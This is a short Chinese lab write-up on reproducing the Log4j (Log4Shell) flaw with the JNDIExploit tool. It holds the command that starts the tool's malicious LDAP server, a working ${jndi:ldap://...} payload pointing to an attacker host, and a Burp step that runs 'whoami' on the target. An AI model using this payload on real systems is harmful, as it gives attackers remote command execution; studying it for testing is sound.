JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

wutiangui2023-09-14 9:58

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
超浪的晨9 分钟前
Java 单元测试详解:从入门到实战,彻底掌握 JUnit 5 + Mockito + Spring Boot 测试技巧
java·开发语言·后端·学习·单元测试·个人开发
中东大鹅15 分钟前
SpringBoot创建项目的方式
java·spring boot·github
泰勒疯狂展开15 分钟前
Java研学-RabbitMQ(三)
java·rabbitmq·java-rabbitmq
Fireworkitte17 分钟前
Java 常用数据库详解
java·数据库
thginWalker20 分钟前
反射和SPI
java
卷心菜不卷Iris26 分钟前
第4章唯一ID生成器——4.1 分布式唯一ID
java·分布式·系统设计·场景题·分布式唯一id
Java初学者小白31 分钟前
秋招Day19 - 分布式 - 理论
java·分布式
lifallen32 分钟前
Flink堆状态后端核心:CopyOnWriteStateMap解析
java·大数据·数据结构·数据库·算法·flink·哈希算法
沧澜sincerely36 分钟前
多线程 Reactor 模式
java·高并发·多线程reactor模式
Harbor Lau39 分钟前
多线程插入保证事务的一致性,亲测可用方式一实测
java·开发语言
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02全球最强模型Grok4,国内已可免费使用!(附教程)03【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致04vue数据变化但页面不变05KGG转MP3工具|非KGM文件|解密音频06这次领先Cursor!体验了Trae 2.0 SOLO 模式,超酷!07Cursor Claude 模型无法使用的解决方法08Claude Code用不了?来试下Qwen3-Coder加持的Qwen Code吧09ChatGPT Agent 完全使用指南:2025年7月最新功能详解10我亲历了2025年最荒谬的前端灾难:一支触控笔"干掉"了全球CSS预处理器